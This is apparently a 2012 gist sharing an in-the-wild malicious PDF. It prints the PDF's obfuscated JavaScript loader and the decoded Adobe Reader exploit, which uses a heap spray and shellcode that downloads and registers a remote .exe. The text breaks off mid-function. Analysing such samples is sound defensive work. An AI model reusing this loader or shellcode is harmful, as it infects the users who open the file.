Skip to content

Instantly share code, notes, and snippets.

@scottschiller

scottschiller/gist:2142215

Created March 20, 2012 22:59
Show Gist options
  • Save scottschiller/2142215 to your computer and use it in GitHub Desktop.
Save scottschiller/2142215 to your computer and use it in GitHub Desktop.
Download ZIP
JavaScript PDF exploit found in the wild, 03/20/2012
Raw
gistfile1.txt
I got this PDF as an email attachment.
The PDF file included a JavaScript block defining an array, and some encoded (for example, {) character entries underneath defining the function responsible for decoding and running it.
The interesting part of the PDF where the script started:
<test:script contentType='&#97;&#0112;plication/&#120;-javascript'>
That was followed by the array data (not encoded), and then this block:
--- snip ---
&#13;
&#102;u&#110;c&#116;i&#111;n&#32;t&#101;s&#116;3&#40;)&#123;i&#102;(&#115;)&#118;=&#97;r&#91;z&#93;;&#115;=&#115;+&#99;c&#91;v&#43;4&#93;;&#125;
&#10;c&#99;=&#123;q&#58;"&#118;a&#114; &#112;d&#105;n&#103;;&#98;,&#99;e&#102;h&#111;t&#115;_&#120;=&#119;A&#121;(&#41;l&#49;'&#52;2&#48;6&#53;7&#56;3&#57;u&#123;.&#86;S&#39;&lt;&#43;I&#125;*&#47;D&#107;R&#37;-&#87;[&#93;m&#67;j&#94;?&#58;L&#66;K&#81;Y&#69;U&#113;F&#77;"&#125;.&#113;;&#13;
&#113;q&#61;'&#103;h&#101;j&#52;v&#97;b&#108;'&#59;
&#10;q&#61;q&#113;[&#50;]&#43;q&#113;[&#53;]&#43;q&#113;[&#54;]&#59;
&#10;q&#61;q&#43;q&#113;[&#56;]&#59;
&#10;b&#61;{&#118;:&#123;q&#58;{&#120;:&#116;h&#105;s&#125;}&#125;.&#118;.&#113;.&#120;;&#13;
&#119;=&#123;v&#58;b&#91;q&#93;}&#46;v&#59;
&#10;s&#61;A&#114;r&#97;y&#40;)&#59;
&#10;n&#61;{&#118;:&#99;c&#125;.&#118;;&#13;
&#102;o&#114;(&#105;=&#48;;&#105;-&#51;7&#53;4&#60;0&#59;i&#43;+&#41;{&#13;
&#122;=&#105;;&#13;
&#116;e&#115;t&#51;(&#41;;&#13;
&#125;
&#10;w&#40;s&#41;;&#13;
--- snip ---
Here is the "obfuscated" exploit script, as found in the PDF (with linebreaks removed from the array):
<script>
ar=[-4, -3, -2, -1, 0, -3, 1, 1, 2, 3, 4, 5, -4, -3, -2, -1, 6, 6, 6, 7, -1, 8, 8, 8, 7, -1, 1, 1, 1, 7, -1, 9, 9, 9, 7, -1, 10, 10, 10, 7, -1, 4, 4, 4, 7, -1, 11, 11, 11, 5, -4, -3, -2, -1, 0, 12, 2, 3, 13, 9, -2, 14, 15, -3, 7, -1, 2, 5, -4, -3, -2, -1, 16, -1, 17, -1, 3, 9, 18, -1, 19, -2, -2, -3, 20, 21, 22, 5, -4, -3, -2, -1, 20, -1, 17, -1, 3, 9, 18, -1, 19, -2, -2, -3, 20, 21, 22, 5, -4, -3, -2, -1, 15, 23, 24, 17, 25, 26, 8, 27, 28, 29, 28, 28, 10, 28, 30, 24, 31, 32, 28, 26, -3, 33, 8, 27, 28, 29, 28, 28, 10, 28, 10, 29, 33, 32, 28, 26, -3, -3, 33, 9, 6, 32, 28, 26, -3, 33, 28, 27, 28, 32, 27, 26, -3, 29, 9, 27, 10, 32, 28, 26, -3, 26, 24, 26, 24, 26, 24, 26, 24, 27, 29, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 24, 27, 33, 34, 32, 28, 26, -3, 29, 26, 27, 28, 29, 28, 28, 10, 28, 28, 28, 26, 28, 28, 28, 28, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 29, 29, 32, 33, 9, 26, 10, 8, 10, 8, 32, 30, 9, 26, 31, 30, 33, 26, 9, 34, 30, 10, 33, 33, 8, 28, 29, 26, 32, 6, 26, 28, 33, 28, 32, 6, 26, 28, 28, 8, 32, 6, 31, 28, 24, 8, 30, 29, 32, 6, 31, 29, 28, 32, 33, 33, 1, 6, 29, 29, 32, 6, 30, 9, 33, 8, 28, 33, 31, 26, 33, 33, 27, 8, 32, 24, 9, 9, 24, 30, 24, 28, 10, 10, 10, 10, 6, 32, 32, 6, 26, 28, 33, 28, 8, 33, 26, 29, 33, 34, 28, 29, 31, 30, 10, 6, 32, 31, 33, 26, 27, 26, 32, 30, 9, 26, 31, 30, 30, 24, 9, 34, 9, 6, 26, 8, 30, 24, 30, 29, 32, 6, 31, 30, 33, 8, 32, 6, 31, 26, 33, 30, 31, 32, 28, 33, 10, 30, 30, 29, 32, 6, 31, 29, 27, 28, 28, 33, 10, 30, 33, 33, 8, 34, 26, 34, 26, 24, 10, 8, -3, 1, 28, 33, 8, 30, 33, 33, 1, 6, 28, 10, 6, 9, 24, 28, 33, 32, 10, 27, 31, 26, 28, 32, 8, 24, 8, 6, 28, 1, 28, 33, 1, -3, 26, 28, 9, 6, 10, 24, 33, 6, 24, 10, 31, 30, 9, 29, 30, 9, 32, 6, 30, 9, 27, 26, 28, 33, 1, 1, 29, 29, 32, 6, 28, 8, 26, 6, 32, 1, 26, 29, 9, 8, 10, 10, 30, 26, 27, 26, 28, 8, 32, 6, 1, 32, 28, 33, 1, 1, 32, 6, 28, 26, 32, 6, 28, 33, 8, 30, -3, 6, 30, 9, 30, 34, 8, 33, 9, 6, 30, 33, -3, 1, 32, 6, 29, 32, 27, 28, 32, 28, 31, 1, 28, 8, 33, 33, 31, 26, 28, 33, 34, 29, 9, 6, 10, 33, 32, 6, 29, 32, 28, 32, 32, 6, 10, 31, 29, -3, 28, 30, 30, 34, 9, 32, 34, 32, 10, 10, 10, 10, 10, 10, 9, 27, 10, 34, 9, 32, 28, 28, 28, 28, 28, 28, 28, 28, 30, 32, 30, 28, 29, -3, 26, 28, 29, 32, 10, 10, 28, 28, 28, 28, 28, 28, 30, 28, 32, 33, 8, 28, 24, 34, 30, 28, 30, 30, 32, 6, 9, 8, 32, 6, 30, 9, 24, 28, 32, 33, 8, 33, 28, 30, 10, 10, 9, 33, 29, 32, 29, 10, 29, 9, 28, 28, 28, 28, 29, 32, 31, 30, 31, 27, 29, 8, 29, 1, 30, 26, 10, 10, 24, 29, 32, 33, 8, 26, 28, 32, 32, 6, 9, 32, 9, 32, 29, 24, 10, 10, 10, 10, 10, 10, 9, 6, 28, 27, 9, 6, 31, 27, 32, 24, 9, 8, 28, 26, 28, 24, 28, 28, 28, 28, 32, 1, 30, 8, 27, 26, 28, 8, 8, 31, 28, 26, 27, 26, 31, 27, 29, 30, 29, 31, 31, 33, 8, 31, 26, 26, 27, 26, 28, 26, 31, 29, 31, 27, 33, 33, 33, 27, 8, 31, 26, 26, 27, 26, 28, 32, 27, 28, 27, 1, 31, 33, 27, 28, 30, 33, 29, 32, 10, 32, 28, 28, 28, 28, 28, 28, 10, 10, 30, 29, 28, 8, 32, 6, 9, 32, 33, 33, 8, 34, 30, 24, 8, 31, 26, 26, 24, 1, 28, 28, 31, 31, 31, 28, 29, 27, 31, 26, 8, 31, 26, 26, 24, 1, 28, 30, 27, 9, 29, 26, 29, 8, 29, 8, 8, 29, 26, 26, 24, 1, 28, 34, 28, 28, 30, 34, 32, -3, 8, 24, 28, 26, 33, 28, 32, 32, 26, 26, 24, 1, 28, 26, 26, 24, 30, 24, 29, -3, 28, 28, 29, -3, 28, 28, 30, 33, 30, 31, 29, -3, 28, 28, 10, 10, 30, 29, 24, 26, 32, 30, 8, 28, 31, 30, 24, 29, 29, -3, 28, 28, 30, 33, 10, 10, 30, 29, 28, 26, 29, -3, 28, 28, 32, 33, 9, 6, 28, 8, 30, 33, 10, 10, 30, 29, 28, 26, 32, 33, 8, 33, 28, 8, 9, 6, 28, 27, 9, 6, 24, 33, 26, 31, 32, 28, 33, 10, 28, 28, 31, 30, 10, -3, 26, 31, 32, 28, 33, 10, 28, 28, 31, 30, 8, 26, 29, -3, 28, 28, 29, -3, 10, 9, 10, 10, 30, 29, 28, 32, 9, 32, 34, 8, 10, 9, 10, 10, 10, 10, 32, 9, 26, 9, 28, 9, 9, 8, 34, 32, 10, 9, 32, -3, 28, 9, 32, 34, 29, 10, 28, 24, 6, 1, 33, 33, 8, -3, 32, -3, 30, 6, 24, 6, 8, 29, 26, 29, 31, 34, 33, 29, 24, -3, 27, 10, 31, 28, 29, 32, 31, 26, 31, 26, 31, 28, 33, -3, 27, 10, 27, 10, 29, 24, 31, 26, 31, 26, 29, 34, 31, 26, 31, 30, 29, 26, 29, 30, 27, 1, 31, 26, 29, 30, 29, 30, 31, 33, 27, 9, 29, 33, 29, 10, 29, 1, 27, 10, 29, 34, 29, 1, 29, 24, 29, 31, 29, 30, 31, 33, 27, 10, 33, 24, 27, 9, 29, 30, 31, 32, 29, 30, 28, 28, 28, 28, 25, 5, -4, -3, -2, -1, 15, 23, 27, 17, 25, 26, 8, 27, 28, 29, 28, 28, 10, -3, 30, 29, 33, 32, 28, 26, -3, 33, 8, 27, 28, 29, 28, 28, 10, 34, 29, 27, 24, 32, 28, 26, -3, 34, 28, 24, 10, 32, 28, 26, -3, 33, 28, 34, 28, 32, 26, 26, -3, 31, 1, 31, 9, 32, 28, 26, -3, 26, 24, 26, 24, 26, 24, 26, 24, 27, 29, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 31, 24, 32, 32, 32, 28, 26, -3, 29, 26, 27, 28, 29, 28, 28, 10, 28, 28, 28, 26, 28, 28, 28, 28, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 26, 24, 29, 29, 32, 33, 9, 26, 10, 8, 10, 8, 32, 30, 9, 26, 31, 30, 33, 26, 9, 34, 30, 10, 33, 33, 8, 28, 29, 26, 32, 6, 26, 28, 33, 28, 32, 6, 26, 28, 28, 8, 32, 6, 31, 28, 24, 8, 30, 29, 32, 6, 31, 29, 28, 32, 33, 33, 1, 6, 29, 29, 32, 6, 30, 9, 33, 8, 28, 33, 31, 26, 33, 33, 27, 8, 32, 24, 9, 9, 24, 30, 24, 28, 10, 10, 10, 10, 6, 32, 32, 6, 26, 28, 33, 28, 8, 33, 26, 29, 33, 34, 28, 29, 31, 30, 10, 6, 32, 31, 33, 26, 27, 26, 32, 30, 9, 26, 31, 30, 30, 24, 9, 34, 9, 6, 26, 8, 30, 24, 30, 29, 32, 6, 31, 30, 33, 8, 32, 6, 31, 26, 33, 30, 31, 32, 28, 33, 10, 30, 30, 29, 32, 6, 31, 29, 27, 28, 28, 33, 10, 30, 33, 33, 8, 34, 26, 34, 26, 24, 10, 8, -3, 1, 28, 33, 8, 30, 33, 33, 1, 6, 28, 10, 6, 9, 24, 28, 33, 32, 10, 27, 31, 26, 28, 32, 8, 24, 8, 6, 28, 1, 28, 33, 1, -3, 26, 28, 9, 6, 10, 24, 33, 6, 24, 10, 31, 30, 9, 29, 30, 9, 32, 6, 30, 9, 27, 26, 28, 33, 1, 1, 29, 29, 32, 6, 28, 8, 26, 6, 32, 1, 26, 29, 9, 8, 10, 10, 30, 26, 27, 26, 28, 8, 32, 6, 1, 32, 28, 33, 1, 1, 32, 6, 28, 26, 32, 6, 28, 33, 8, 30, -3, 6, 30, 9, 30, 34, 8, 33, 9, 6, 30, 33, -3, 1, 32, 6, 29, 32, 27, 28, 32, 28, 31, 1, 28, 8, 33, 33, 31, 26, 28, 33, 34, 29, 9, 6, 10, 33, 32, 6, 29, 32, 28, 32, 32, 6, 10, 31, 29, -3, 28, 30, 30, 34, 9, 32, 34, 32, 10, 10, 10, 10, 10, 10, 9, 27, 10, 34, 9, 32, 28, 28, 28, 28, 28, 28, 28, 28, 30, 32, 30, 28, 29, -3, 26, 28, 29, 32, 10, 10, 28, 28, 28, 28, 28, 28, 30, 28, 32, 33, 8, 28, 24, 34, 30, 28, 30, 30, 32, 6, 9, 8, 32, 6, 30, 9, 24, 28, 32, 33, 8, 33, 28, 30, 10, 10, 9, 33, 29, 32, 29, 10, 29, 9, 28, 28, 28, 28, 29, 32, 31, 30, 31, 27, 29, 8, 29, 1, 30, 26, 10, 10, 24, 29, 32, 33, 8, 26, 28, 32, 32, 6, 9, 32, 9, 32, 29, 24, 10, 10, 10, 10, 10, 10, 9, 6, 28, 27, 9, 6, 31, 27, 32, 24, 9, 8, 28, 26, 28, 24, 28, 28, 28, 28, 32, 1, 30, 8, 27, 26, 28, 8, 8, 31, 28, 26, 27, 26, 31, 27, 29, 30, 29, 31, 31, 33, 8, 31, 26, 26, 27, 26, 28, 26, 31, 29, 31, 27, 33, 33, 33, 27, 8, 31, 26, 26, 27, 26, 28, 32, 27, 28, 27, 1, 31, 33, 27, 28, 30, 33, 29, 32, 10, 32, 28, 28, 28, 28, 28, 28, 10, 10, 30, 29, 28, 8, 32, 6, 9, 32, 33, 33, 8, 34, 30, 24, 8, 31, 26, 26, 24, 1, 28, 28, 31, 31, 31, 28, 29, 27, 31, 26, 8, 31, 26, 26, 24, 1, 28, 30, 27, 9, 29, 26, 29, 8, 29, 8, 8, 29, 26, 26, 24, 1, 28, 34, 28, 28, 30, 34, 32, -3, 8, 24, 28, 26, 33, 28, 32, 32, 26, 26, 24, 1, 28, 26, 26, 24, 30, 24, 29, -3, 28, 28, 29, -3, 28, 28, 30, 33, 30, 31, 29, -3, 28, 28, 10, 10, 30, 29, 24, 26, 32, 30, 8, 28, 31, 30, 24, 29, 29, -3, 28, 28, 30, 33, 10, 10, 30, 29, 28, 26, 29, -3, 28, 28, 32, 33, 9, 6, 28, 8, 30, 33, 10, 10, 30, 29, 28, 26, 32, 33, 8, 33, 28, 8, 9, 6, 28, 27, 9, 6, 24, 33, 26, 31, 32, 28, 33, 10, 28, 28, 31, 30, 10, -3, 26, 31, 32, 28, 33, 10, 28, 28, 31, 30, 8, 26, 29, -3, 28, 28, 29, -3, 10, 9, 10, 10, 30, 29, 28, 32, 9, 32, 34, 8, 10, 9, 10, 10, 10, 10, 32, 9, 26, 9, 28, 9, 9, 8, 34, 32, 10, 9, 32, -3, 28, 9, 32, 34, 29, 10, 28, 24, 6, 1, 33, 33, 8, -3, 32, -3, 30, 6, 24, 6, 8, 29, 26, 29, 31, 34, 33, 29, 24, -3, 27, 10, 31, 28, 29, 32, 31, 26, 31, 26, 31, 28, 33, -3, 27, 10, 27, 10, 29, 24, 31, 26, 31, 26, 29, 34, 31, 26, 31, 30, 29, 26, 29, 30, 27, 1, 31, 26, 29, 30, 29, 30, 31, 33, 27, 9, 29, 33, 29, 10, 29, 1, 27, 10, 29, 34, 29, 1, 29, 24, 29, 31, 29, 30, 31, 33, 27, 10, 33, 24, 27, 9, 29, 30, 31, 32, 29, 30, 28, 28, 28, 28, 25, 5, 15, 23, 33, 17, -3, 0, 0, 5, 15, 23, 26, 17, 3, 9, 18, -1, 19, -2, -2, -3, 20, 21, 22, 5, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 23, 30, 21, 22, 36, -4, -3, -2, -1, 15, 23, 29, 17, 15, 23, 33, 37, -4, 2, 9, 18, 9, -2, 38, 9, -2, 14, 2, 12, 3, 37, 13, 12, 39, 13, -2, 2, 3, 4, 21, 22, 5, 15, 23, 29, 17, 15, 23, 29, 37, -2, 9, 0, 23, -3, 8, 9, 21, 40, 37, 40, 7, 40, 40, 22, 5, 18, 11, 2, 23, 9, 21, 15, 23, 29, 37, 23, 9, 3, 4, 13, 11, 41, 26, 22, 15, 23, 29, 42, 17, 40, 28, 40, 5, -2, 9, 13, 35, -2, 3, -1, 0, -3, -2, 14, 9, 43, 3, 13, 21, 15, 23, 29, 7, 24, 28, 22, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 23, 31, 21, 15, 23, 32, 7, 15, 23, 34, 22, 36, 18, 11, 2, 23, 9, 21, 15, 23, 32, 37, 23, 9, 3, 4, 13, 11, 45, 27, 41, 15, 23, 34, 22, 15, 23, 32, 42, 17, 15, 23, 32, 5, -2, 9, 13, 35, -2, 3, -1, 15, 23, 32, 37, 14, 35, 6, 14, 13, -2, 2, 3, 4, 21, 28, 7, 15, 23, 34, 46, 27, 22, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 43, 28, 21, 15, 43, 24, 22, 36, 15, 43, 24, 17, 35, 3, 9, 14, 8, -3, 0, 9, 21, 15, 43, 24, 22, 5, -2, 12, 13, 9, 47, -3, 48, 17, 15, 43, 24, 37, 23, 9, 3, 4, 13, 11, 45, 27, 5, 1, -3, 48, 49, 12, 13, 9, 17, 35, 3, 9, 14, 8, -3, 0, 9, 21, 40, 50, 35, 34, 28, 34, 28, 40, 22, 5, 14, 0, -2, -3, 20, 17, 15, 23, 31, 21, 1, -3, 48, 49, 12, 13, 9, 7, 28, 16, 27, 28, 28, 28, 51, -2, 12, 13, 9, 47, -3, 48, 22, 5, 23, 12, 16, 52, 11, 9, 9, 17, 15, 43, 24, 42, 14, 0, -2, -3, 20, 5, 23, 12, 16, 52, 11, 9, 9, 17, 15, 23, 31, 21, 23, 12, 16, 52, 11, 9, 9, 7, 30, 27, 26, 28, 34, 32, 22, 5, 10, 12, -2, 21, 2, 17, 28, 5, -1, 2, -1, 41, -1, 26, 28, 28, 5, -1, 2, 42, 42, 22, 15, 23, 26, 53, 2, 54, 17, 23, 12, 16, 52, 11, 9, 9, 37, 14, 35, 6, 14, 13, -2, 21, 28, 7, 23, 12, 16, 52, 11, 9, 9, 37, 23, 9, 3, 4, 13, 11, 51, 24, 22, 42, 1, -3, 48, 49, 12, 13, 9, 5, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 43, 27, 21, 15, 43, 24, 7, 23, 9, 3, 22, 36, 18, 11, 2, 23, 9, 21, 15, 43, 24, 37, 23, 9, 3, 4, 13, 11, 41, 23, 9, 3, 22, 15, 43, 24, 42, 17, 15, 43, 24, 5, -2, 9, 13, 35, -2, 3, -1, 15, 43, 24, 37, 14, 35, 6, 14, 13, -2, 2, 3, 4, 21, 28, 7, 23, 9, 3, 22, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 43, 33, 21, 15, 43, 24, 22, 36, -2, 9, 13, 17, 40, 40, 5, 10, 12, -2, 21, 2, 17, 28, 5, 2, 41, 15, 43, 24, 37, 23, 9, 3, 4, 13, 11, 5, 2, 42, 17, 27, 22, 36, 6, 17, 15, 43, 24, 37, 14, 35, 6, 14, 13, -2, 21, 2, 7, 27, 22, 5, 8, 17, 0, -3, -2, 14, 9, 43, 3, 13, 21, 6, 7, 24, 29, 22, 5, -2, 9, 13, 42, 17, 39, 13, -2, 2, 3, 4, 37, 10, -2, 12, 55, 56, 11, -3, -2, 56, 12, 1, 9, 21, 8, 22, 5, 44, -2, 9, 13, 35, -2, 3, -1, -2, 9, 13, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 57, 2, 24, 21, 15, 43, 24, 7, 15, 43, 26, 22, 36, 15, 43, 30, 17, 40, 40, 5, 10, 12, -2, 21, 15, 43, 29, 17, 28, 5, 15, 43, 29, 41, 15, 43, 24, 37, 23, 9, 3, 4, 13, 11, 5, 15, 43, 29, 42, 42, 22, 36, 15, 23, 34, 17, 15, 43, 26, 37, 23, 9, 3, 4, 13, 11, 5, 15, 43, 31, 17, 15, 43, 24, 37, 8, 11, -3, -2, 56, 12, 1, 9, 19, 13, 21, 15, 43, 29, 22, 5, 15, 43, 32, 17, 15, 43, 26, 37, 8, 11, -3, -2, 56, 12, 1, 9, 19, 13, 21, 15, 43, 29, 50, 15, 23, 34, 22, 5, 15, 43, 30, 42, 17, 39, 13, -2, 2, 3, 4, 37, 10, -2, 12, 55, 56, 11, -3, -2, 56, 12, 1, 9, 21, 15, 43, 31, 58, 15, 43, 32, 22, 5, 44, -2, 9, 13, 35, -2, 3, -1, 15, 43, 30, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 43, 34, 21, 15, 43, 29, 22, 36, 15, 57, 28, 17, 15, 43, 29, 37, 13, 12, 39, 13, -2, 2, 3, 4, 21, 24, 29, 22, 5, 15, 57, 24, 17, 15, 57, 28, 37, 23, 9, 3, 4, 13, 11, 5, 15, 43, 30, 17, 21, 15, 57, 24, 50, 27, 22, 59, 40, 28, 40, 42, 15, 57, 28, 60, 15, 57, 28, 5, -2, 9, 13, 35, -2, 3, -1, 15, 43, 30, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 57, 27, 21, 15, 43, 24, 22, 36, 15, 43, 30, 17, 40, 40, 5, 10, 12, -2, 21, 15, 43, 29, 17, 28, 5, 15, 43, 29, 41, 15, 43, 24, 37, 23, 9, 3, 4, 13, 11, 5, 15, 43, 29, 42, 17, 27, 22, 36, 15, 43, 30, 42, 17, 40, 50, 35, 40, 5, 15, 43, 30, 42, 17, 15, 43, 34, 21, 15, 43, 24, 37, 8, 11, -3, -2, 56, 12, 1, 9, 19, 13, 21, 15, 43, 29, 42, 24, 22, 22, 5, 15, 43, 30, 42, 17, 15, 43, 34, 21, 15, 43, 24, 37, 8, 11, -3, -2, 56, 12, 1, 9, 19, 13, 21, 15, 43, 29, 22, 22, 44, -2, 9, 13, 35, -2, 3, -1, 15, 43, 30, 44, 10, 35, 3, 8, 13, 2, 12, 3, -1, 15, 57, 33, 21, 22, 36, 15, 57, 26, 17, 15, 23, 30, 21, 22, 5, 2, 10, 21, 15, 57, 26, 41, 34, 28, 28, 28, 22, 36, 15, 57, 30, 17, 40, 12, 42, 35, 19, 39, 57, 4, 4, 4, 48, 0, 35, 61, 26, 62, 63, 46, 46, 46, 46, 46, 18, 19, 19, 19, 19, 62, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 64, 19, 19, 19, 19, 19, 19, 19, 19, 10, 11, -3, 19, 39, 2, 19, 4, 65, 19, 34, 32, 66, 43, 62, 63, 40, 5, 15, 57, 29, 17, 15, 23, 24, 5, 15, 57, 31, 17, 15, 43, 33, 21, 15, 57, 29, 22, 44, 9, 23, 14, 9, 36, 15, 57, 30, 17, 40, 48, 62, 42, 19, 39, 57, 2, 64, 11, 66, 0, 34, 10, 12, 62, 63, 46, 46, 46, 46, 46, 18, 19, 19, 19, 19, 62, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 64, 19, 19, 19, 19, 19, 19, 19, 19, 65, 16, 56, 19, 39, 2, 19, 4, 65, 19, 46, 10, 66, 26, 62, 63, 40, 5, 15, 57, 29, 17, 15, 23, 27, 5, 15, 57, 31, 17, 15, 43, 33, 21, 15, 57, 29, 22, 44, 15, 57, 32, 17, 40, 39, 67, 48, 68, 19, 47, 4, 4, 19, 19, 62, 62, 40, 5, 15, 57, 34, 17, 15, 43, 27, 21, 40, 64, 67, 69, 62, 40, 7, 24, 28, 34, 32, 26, 22, 5, 15, 23, 23, 28, 17, 40, 64, 64, 8, 19, 19, 19, 66, 47, 19, 19, 66, 19, 19, 19, 19, 18, 43, 19, 19, 19, 19, 64, 66, 47, 19, 19, 66, 19, 19, 19, 19, 62, 19, 19, 19, 19, 19, 18, 66, 47, 19, 19, 66, 19, 19, 19, 19, 62, 19, 19, 19, 19, 62, 4, 66, 47, 19, 19, 66, 19, 19, 19, 19, 62, 19, 19, 19, 19, 66, 64, 66, 66, 19, 19, 66, 19, 19, 19, 19, 43, 19, 19, 19, 19, 69, 18, 66, 66, 19, 19, 66, 19, 19, 19, 19, 18, 43, 19, 19, 19, 67, 19, 66, 47, 19, 70, 18, 19, 19, 19, 56, 39, 43, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 70, 47, 19, 57, 46, 46, 46, 46, 46, 40, 5, 15, 23, 23, 24, 17, 15, 57, 32, 42, 15, 57, 34, 42, 15, 23, 23, 28, 42, 15, 57, 30, 5, 15, 23, 23, 27, 17, 15, 57, 2, 24, 21, 15, 57, 31, 7, 40, 40, 22, 5, 2, 10, 21, 15, 23, 23, 27, 37, 23, 9, 3, 4, 13, 11, 50, 27, 22, 15, 23, 23, 27, 42, 17, 35, 3, 9, 14, 8, -3, 0, 9, 21, 40, 50, 28, 28, 40, 22, 5, 15, 23, 23, 33, 17, 15, 57, 27, 21, 15, 23, 23, 27, 22, 5, 18, 2, 13, 11, 21, 36, 48, 60, 15, 23, 23, 33, 44, 22, 15, 43, 28, 21, 48, 22, 5, 68, 18, 9, 24, 27, 33, 6, 37, -2, -3, 18, 38, -3, 23, 35, 9, 17, 15, 23, 23, 24, 44, 15, 57, 33, 21, 22, 5];
function test3() {
if (s) v = ar[z];
s = s + cc[v + 4];
}
cc = {
q: "var pding;b,cefhots_x=wAy()l1'420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
}.q;
qq = 'ghej4vabl';
q = qq[2] + qq[5] + qq[6];
q = q + qq[8];
b = {
v: {
q: {
x: this
}
}
}.v.q.x;
w = {
v: b[q]
}.v;
s = Array();
n = {
v: cc
}.v;
for (i = 0; i - 3754 < 0; i++) {
z = i;
test3();
}
console.log(s);
// W = EVAL, do not run
// w(s);
</script>
... Running this code, minus the eval part, produces the below "decrypted" function which is presumably targeting a version of Adobe Reader (Viewer)? - I'm pretty sure you wouldn't want to run this in that environment.
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = '4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f61747469747564652d746565732e636f6d2f696d616765732f312e6578650000';
var _l2 = '4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f0004000041414141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f61747469747564652d746565732e636f6d2f696d616765732f312e6578650000';
_l3 = app;
_l4 = new Array();
function _l5() {
var _l6 = _l3.viewerVersion.toString();
_l6 = _l6.replace('.', '');
while (_l6.length < 4) _l6 += '0';
return parseInt(_l6, 10)
}
function _l7(_l8, _l9) {
while (_l8.length * 2 < _l9) _l8 += _l8;
return _l8.substring(0, _l9 / 2)
}
function _I0(_I1) {
_I1 = unescape(_I1);
roteDak = _I1.length * 2;
dakRote = unescape('%u9090');
spray = _l7(dakRote, 0x2000 - roteDak);
loxWhee = _I1 + spray;
loxWhee = _l7(loxWhee, 524098);
for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len) {
while (_I1.length < len) _I1 += _I1;
return _I1.substring(0, len)
}
function _I3(_I1) {
ret = '';
for (i = 0; i < _I1.length; i += 2) {
b = _I1.substr(i, 2);
c = parseInt(b, 16);
ret += String.fromCharCode(c);
}
return ret
}
function _ji1(_I1, _I4) {
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6++) {
_l9 = _I4.length;
_I7 = _I1.charCodeAt(_I6);
_I8 = _I4.charCodeAt(_I6 % _l9);
_I5 += String.fromCharCode(_I7 ^ _I8);
}
return _I5
}
function _I9(_I6) {
_j0 = _I6.toString(16);
_j1 = _j0.length;
_I5 = (_j1 % 2) ? '0' + _j0 : _j0;
return _I5
}
function _j2(_I1) {
_I5 = '';
for (_I6 = 0; _I6 < _I1.length; _I6 += 2) {
_I5 += '%u';
_I5 += _I9(_I1.charCodeAt(_I6 + 1));
_I5 += _I9(_I1.charCodeAt(_I6))
}
return _I5
}
function _j3() {
_j4 = _l5();
if (_j4 < 9000) {
_j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
_j6 = _l1;
_j7 = _I3(_j6)
} else {
_j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
_j6 = _l2;
_j7 = _I3(_j6)
}
_j8 = 'SUkqADggAABB';
